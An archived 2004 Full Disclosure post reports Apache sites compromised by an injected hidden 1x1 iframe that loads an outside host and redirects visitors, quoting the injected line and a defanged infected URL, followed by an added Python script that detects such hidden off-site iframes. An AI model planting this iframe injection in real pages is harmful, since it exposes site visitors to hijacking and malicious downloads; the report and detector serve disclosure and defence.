Full Disclosure mailing list archives

browser hijack by apache sites


From: Filbert <filbert () pandora be>
Date: Sun, 23 May 2004 15:19:30 +0200

Hi,

This is the second time this weekend that I've been warned of an apache site 
on a Linux server where a line of code was added to redirect browsers to porn 
sites.
First was the site of a Belgian political party. Second came today, and as of 
writing this it's still there. The admin was informed so it can be gone soon.

hxxp://www.previsit.com/carrefour/nl/ <- hxxp must be changed to http
IE users do NOT click.

The code added at the bottom is:

<iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1 
HEIGHT=1></iframe></body>

Anyone seen this before? What vulnerability is exploited here? FP?

Thx,
Filb.

-- 
echo "+++ATH0filb@+++ATH0filb () linuxmail org" | sed 's/+++ATH0//g'


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
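
An added example, not part of the original post: a way for a site administrator to audit served HTML for the pattern reported above, an iframe that loads an off-site URL into a 1x1 or otherwise hidden frame. The function name, the `allowed_hosts` parameter and the `.example` hosts in the sample page are assumptions constructed for illustration.

```python
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

def _tiny(value):
    """True for a 0 or 1 pixel dimension, as in the reported WIDTH=1 HEIGHT=1."""
    digits = (value or "").strip().lower().removesuffix("px")
    return digits.isdigit() and int(digits) <= 1

class _IframeAudit(HTMLParser):
    """Records iframes whose src is off-site and whose frame is effectively invisible."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []  # (line number, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}  # names are lower-cased by the parser
        host = (urlparse(a.get("src", "").strip()).hostname or "").lower()
        external = bool(host) and host not in self.allowed  # relative src has no host
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        if external and hidden:
            self.findings.append((self.getpos()[0], a["src"].strip()))

def find_hidden_iframes(html, allowed_hosts):
    """Return (line, src) for every hidden iframe pointing outside allowed_hosts."""
    audit = _IframeAudit(allowed_hosts)
    audit.feed(html)
    return audit.findings

# Constructed sample page: one legitimate local iframe, one appended before </body>.
SAMPLE = """<html><body>
<h1>Store locator</h1>
<iframe src="/map.html" width="400" height="300"></iframe>
<iframe SRC="http://injected.example/fa/?d=get" WIDTH=1 HEIGHT=1></iframe></body>
</html>"""

if __name__ == "__main__":
    # Usage: python audit.py <own-host> <file.html> [...]; with no files, scan SAMPLE.
    own = sys.argv[1] if len(sys.argv) > 1 else "shop.example"
    pages = {p: open(p, errors="replace").read() for p in sys.argv[2:]} or {"SAMPLE": SAMPLE}
    for name, html in pages.items():
        for line, src in find_hidden_iframes(html, {own}):
            print(f"{name}:{line}: hidden off-site iframe -> {src}")
```

A hit shows only that the file was modified; how the attacker obtained write access to the document root still has to be established from server and access logs.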